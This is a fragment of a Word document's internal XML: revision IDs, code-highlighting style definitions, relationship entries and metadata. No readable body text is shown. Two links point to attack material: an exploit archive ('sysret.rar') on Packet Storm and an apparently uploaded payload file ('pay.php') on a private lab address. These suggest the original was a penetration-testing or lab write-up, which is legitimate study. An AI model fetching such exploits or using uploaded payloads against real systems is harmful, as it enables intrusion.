    </w:p>
    <w:p w14:paraId="5A37BF1C" w14:textId="31789BCD" w:rsidR="00DC32D8" w:rsidRPr="008F4180" w:rsidRDefault="00DC32D8" w:rsidP="008F4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2D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FDCDE7" wp14:editId="3ACFD647">
            <wp:extent cx="5943600" cy="17602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2D8" w:rsidRPr="008F4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12"/>
    <w:rsid w:val="00020D3C"/>
    <w:rsid w:val="00061102"/>
    <w:rsid w:val="000644F3"/>
    <w:rsid w:val="000672DB"/>
    <w:rsid w:val="000678E1"/>
    <w:rsid w:val="00071278"/>
    <w:rsid w:val="00084688"/>
    <w:rsid w:val="00097322"/>
    <w:rsid w:val="000A0557"/>
    <w:rsid w:val="000A402C"/>
    <w:rsid w:val="000A42A8"/>
    <w:rsid w:val="000B2C12"/>
    <w:rsid w:val="000B359C"/>
    <w:rsid w:val="000B3C7E"/>
    <w:rsid w:val="000B44AA"/>
    <w:rsid w:val="000C6133"/>
    <w:rsid w:val="000D1D5F"/>
    <w:rsid w:val="000D42CB"/>
    <w:rsid w:val="000D5D50"/>
    <w:rsid w:val="0010527A"/>
    <w:rsid w:val="00105BCC"/>
    <w:rsid w:val="0011085B"/>
    <w:rsid w:val="00141AF1"/>
    <w:rsid w:val="0015224E"/>
    <w:rsid w:val="00153B63"/>
    <w:rsid w:val="001774C6"/>
    <w:rsid w:val="00181C4F"/>
    <w:rsid w:val="001868AF"/>
    <w:rsid w:val="00195ADE"/>
    <w:rsid w:val="001964E6"/>
    <w:rsid w:val="001A211C"/>
    <w:rsid w:val="001B100A"/>
    <w:rsid w:val="001B3960"/>
    <w:rsid w:val="001C4DB2"/>
    <w:rsid w:val="001C55B3"/>
    <w:rsid w:val="001D0CC7"/>
    <w:rsid w:val="001E4F95"/>
    <w:rsid w:val="001F34BA"/>
    <w:rsid w:val="001F3613"/>
    <w:rsid w:val="00205A79"/>
    <w:rsid w:val="00213F4F"/>
    <w:rsid w:val="00224C83"/>
    <w:rsid w:val="0024398F"/>
    <w:rsid w:val="002465E2"/>
    <w:rsid w:val="0027455D"/>
    <w:rsid w:val="0027525A"/>
    <w:rsid w:val="00276F74"/>
    <w:rsid w:val="0028549B"/>
    <w:rsid w:val="0029156A"/>
    <w:rsid w:val="00297921"/>
    <w:rsid w:val="002A178F"/>
    <w:rsid w:val="002A1E1C"/>
    <w:rsid w:val="002A662B"/>
    <w:rsid w:val="002C347B"/>
    <w:rsid w:val="002E32F0"/>
    <w:rsid w:val="002E3F1E"/>
    <w:rsid w:val="002E462E"/>
    <w:rsid w:val="002E7E7D"/>
    <w:rsid w:val="002F1A47"/>
    <w:rsid w:val="002F2D68"/>
    <w:rsid w:val="002F53EF"/>
    <w:rsid w:val="002F6EAD"/>
    <w:rsid w:val="00305DA1"/>
    <w:rsid w:val="00315F7D"/>
    <w:rsid w:val="0032104C"/>
    <w:rsid w:val="00327440"/>
    <w:rsid w:val="00343673"/>
    <w:rsid w:val="00364D45"/>
    <w:rsid w:val="00372A18"/>
    <w:rsid w:val="00385A78"/>
    <w:rsid w:val="003930B0"/>
    <w:rsid w:val="00396A60"/>
    <w:rsid w:val="003A1D50"/>
    <w:rsid w:val="003A4CE5"/>
    <w:rsid w:val="003A53B0"/>
    <w:rsid w:val="003C5A2D"/>
    <w:rsid w:val="003D2E93"/>
    <w:rsid w:val="00401733"/>
    <w:rsid w:val="0040463F"/>
    <w:rsid w:val="004208D4"/>
    <w:rsid w:val="004335D2"/>
    <w:rsid w:val="00433C05"/>
    <w:rsid w:val="0043489F"/>
    <w:rsid w:val="0044216B"/>
    <w:rsid w:val="004472E9"/>
    <w:rsid w:val="00453CDB"/>
    <w:rsid w:val="004B562B"/>
    <w:rsid w:val="004C37F6"/>
    <w:rsid w:val="004C5FEA"/>
    <w:rsid w:val="004D0979"/>
    <w:rsid w:val="004E0E3B"/>
    <w:rsid w:val="004E1AD4"/>
    <w:rsid w:val="004F23E6"/>
    <w:rsid w:val="00503545"/>
    <w:rsid w:val="00507175"/>
    <w:rsid w:val="00510E2E"/>
    <w:rsid w:val="00520A15"/>
    <w:rsid w:val="00520BF9"/>
    <w:rsid w:val="0052573E"/>
    <w:rsid w:val="0053550B"/>
    <w:rsid w:val="005376C5"/>
    <w:rsid w:val="00555795"/>
    <w:rsid w:val="00555EF3"/>
    <w:rsid w:val="00571348"/>
    <w:rsid w:val="00576C0B"/>
    <w:rsid w:val="00585956"/>
    <w:rsid w:val="005A12D7"/>
    <w:rsid w:val="005B090C"/>
    <w:rsid w:val="005B30E4"/>
    <w:rsid w:val="005B7B2A"/>
    <w:rsid w:val="005D5443"/>
    <w:rsid w:val="005F7D48"/>
    <w:rsid w:val="00612A69"/>
    <w:rsid w:val="00612EC7"/>
    <w:rsid w:val="00617CC3"/>
    <w:rsid w:val="00620435"/>
    <w:rsid w:val="00625989"/>
    <w:rsid w:val="00653DFE"/>
    <w:rsid w:val="00660754"/>
    <w:rsid w:val="0066393B"/>
    <w:rsid w:val="00670BCA"/>
    <w:rsid w:val="00680E8D"/>
    <w:rsid w:val="006833B3"/>
    <w:rsid w:val="00686FD9"/>
    <w:rsid w:val="006A7619"/>
    <w:rsid w:val="006B6A11"/>
    <w:rsid w:val="006D08C8"/>
    <w:rsid w:val="006E6E1F"/>
    <w:rsid w:val="006F5230"/>
    <w:rsid w:val="00703D22"/>
    <w:rsid w:val="007345AD"/>
    <w:rsid w:val="00736083"/>
    <w:rsid w:val="00745EA9"/>
    <w:rsid w:val="007659E3"/>
    <w:rsid w:val="00777C95"/>
    <w:rsid w:val="0078219F"/>
    <w:rsid w:val="00783DE5"/>
    <w:rsid w:val="007A0E1D"/>
    <w:rsid w:val="007A20B9"/>
    <w:rsid w:val="007B1FF2"/>
    <w:rsid w:val="007C5B71"/>
    <w:rsid w:val="007D320C"/>
    <w:rsid w:val="007D5024"/>
    <w:rsid w:val="007D5FAA"/>
    <w:rsid w:val="007D6360"/>
    <w:rsid w:val="007D6848"/>
    <w:rsid w:val="007E50B4"/>
    <w:rsid w:val="007F225A"/>
    <w:rsid w:val="007F45EB"/>
    <w:rsid w:val="007F62CA"/>
    <w:rsid w:val="008147F5"/>
    <w:rsid w:val="00821881"/>
    <w:rsid w:val="008250E9"/>
    <w:rsid w:val="008467D3"/>
    <w:rsid w:val="0084792C"/>
    <w:rsid w:val="00850BBE"/>
    <w:rsid w:val="00856A1E"/>
    <w:rsid w:val="008600E9"/>
    <w:rsid w:val="00861269"/>
    <w:rsid w:val="0087237C"/>
    <w:rsid w:val="00872F0E"/>
    <w:rsid w:val="00881234"/>
    <w:rsid w:val="00895CB8"/>
    <w:rsid w:val="008A27F1"/>
    <w:rsid w:val="008A5CE5"/>
    <w:rsid w:val="008A72A2"/>
    <w:rsid w:val="008B5B26"/>
    <w:rsid w:val="008D3C5E"/>
    <w:rsid w:val="008D770C"/>
    <w:rsid w:val="008F4180"/>
    <w:rsid w:val="00906D51"/>
    <w:rsid w:val="009111F2"/>
    <w:rsid w:val="0091411B"/>
    <w:rsid w:val="00923A77"/>
    <w:rsid w:val="009378FD"/>
    <w:rsid w:val="009455A2"/>
    <w:rsid w:val="00947044"/>
    <w:rsid w:val="00954333"/>
    <w:rsid w:val="00956056"/>
    <w:rsid w:val="00956693"/>
    <w:rsid w:val="009704CB"/>
    <w:rsid w:val="00973616"/>
    <w:rsid w:val="00975947"/>
    <w:rsid w:val="009A133D"/>
    <w:rsid w:val="009B2186"/>
    <w:rsid w:val="009B4A9C"/>
    <w:rsid w:val="009C52B6"/>
    <w:rsid w:val="009D3FD8"/>
    <w:rsid w:val="009E382A"/>
    <w:rsid w:val="009E74EF"/>
    <w:rsid w:val="009F410E"/>
    <w:rsid w:val="00A026F8"/>
    <w:rsid w:val="00A05A32"/>
    <w:rsid w:val="00A074F9"/>
    <w:rsid w:val="00A33FDF"/>
    <w:rsid w:val="00A354CE"/>
    <w:rsid w:val="00A42BF7"/>
    <w:rsid w:val="00A47CEA"/>
    <w:rsid w:val="00A6538D"/>
    <w:rsid w:val="00A862EC"/>
    <w:rsid w:val="00AA0F66"/>
    <w:rsid w:val="00AA4887"/>
    <w:rsid w:val="00AA761D"/>
    <w:rsid w:val="00AB7BC7"/>
    <w:rsid w:val="00AD0AD2"/>
    <w:rsid w:val="00AD1234"/>
    <w:rsid w:val="00AE1337"/>
    <w:rsid w:val="00AE78C2"/>
    <w:rsid w:val="00AF3844"/>
    <w:rsid w:val="00AF6F76"/>
    <w:rsid w:val="00B11031"/>
    <w:rsid w:val="00B32FE0"/>
    <w:rsid w:val="00B47CA1"/>
    <w:rsid w:val="00B800CB"/>
    <w:rsid w:val="00B80191"/>
    <w:rsid w:val="00B8353B"/>
    <w:rsid w:val="00B8634F"/>
    <w:rsid w:val="00BB2761"/>
    <w:rsid w:val="00BB3298"/>
    <w:rsid w:val="00BC214F"/>
    <w:rsid w:val="00BD1FA5"/>
    <w:rsid w:val="00BD7D4F"/>
    <w:rsid w:val="00C00605"/>
    <w:rsid w:val="00C02111"/>
    <w:rsid w:val="00C02741"/>
    <w:rsid w:val="00C225E6"/>
    <w:rsid w:val="00C23F55"/>
    <w:rsid w:val="00C243BE"/>
    <w:rsid w:val="00C333F5"/>
    <w:rsid w:val="00C5275D"/>
    <w:rsid w:val="00C62F98"/>
    <w:rsid w:val="00C64A02"/>
    <w:rsid w:val="00C66136"/>
    <w:rsid w:val="00C73C1C"/>
    <w:rsid w:val="00C8117D"/>
    <w:rsid w:val="00C81B8B"/>
    <w:rsid w:val="00C904E1"/>
    <w:rsid w:val="00CB7FE7"/>
    <w:rsid w:val="00CC6298"/>
    <w:rsid w:val="00CE5CA5"/>
    <w:rsid w:val="00CF2CCA"/>
    <w:rsid w:val="00D02BF1"/>
    <w:rsid w:val="00D02D70"/>
    <w:rsid w:val="00D035CA"/>
    <w:rsid w:val="00D12B78"/>
    <w:rsid w:val="00D25638"/>
    <w:rsid w:val="00D369CB"/>
    <w:rsid w:val="00D439EF"/>
    <w:rsid w:val="00D443AE"/>
    <w:rsid w:val="00D5311E"/>
    <w:rsid w:val="00D54EA9"/>
    <w:rsid w:val="00D618D5"/>
    <w:rsid w:val="00D6198C"/>
    <w:rsid w:val="00D668B2"/>
    <w:rsid w:val="00D70687"/>
    <w:rsid w:val="00D73984"/>
    <w:rsid w:val="00D75923"/>
    <w:rsid w:val="00D9184B"/>
    <w:rsid w:val="00DA158C"/>
    <w:rsid w:val="00DC32D8"/>
    <w:rsid w:val="00DD36A7"/>
    <w:rsid w:val="00DD50DE"/>
    <w:rsid w:val="00DF2357"/>
    <w:rsid w:val="00DF23C4"/>
    <w:rsid w:val="00DF6380"/>
    <w:rsid w:val="00E008D1"/>
    <w:rsid w:val="00E27980"/>
    <w:rsid w:val="00E36742"/>
    <w:rsid w:val="00E4297B"/>
    <w:rsid w:val="00E443EC"/>
    <w:rsid w:val="00E46315"/>
    <w:rsid w:val="00E471BE"/>
    <w:rsid w:val="00E61964"/>
    <w:rsid w:val="00E9086F"/>
    <w:rsid w:val="00E95836"/>
    <w:rsid w:val="00EA053E"/>
    <w:rsid w:val="00EA58E7"/>
    <w:rsid w:val="00EC2D2A"/>
    <w:rsid w:val="00EF20EC"/>
    <w:rsid w:val="00F06E33"/>
    <w:rsid w:val="00F23082"/>
    <w:rsid w:val="00F36EEF"/>
    <w:rsid w:val="00F56EBC"/>
    <w:rsid w:val="00F602B7"/>
    <w:rsid w:val="00F6658D"/>
    <w:rsid w:val="00F73C9D"/>
    <w:rsid w:val="00F87F59"/>
    <w:rsid w:val="00FA5017"/>
    <w:rsid w:val="00FB3151"/>
    <w:rsid w:val="00FB3D34"/>
    <w:rsid w:val="00FB569B"/>
    <w:rsid w:val="00FC101B"/>
    <w:rsid w:val="00FC54EA"/>
    <w:rsid w:val="00FD01DE"/>
    <w:rsid w:val="00FD23DB"/>
    <w:rsid w:val="00FE7D9E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E9E4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{51D5995A-0BF9-4F4A-A80A-9C524391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4C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54CE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A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A354CE"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00821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hyperlink" Target="https://dl.packetstormsecurity.net/1208-exploits/sysret.rar" TargetMode="External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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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3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4.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.44.132:8585/uploads/pay.php" TargetMode="External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F044-82AF-4190-ABC2-5B6131B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2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dai</cp:lastModifiedBy>
  <cp:revision>316</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-16T15:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-15T15:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>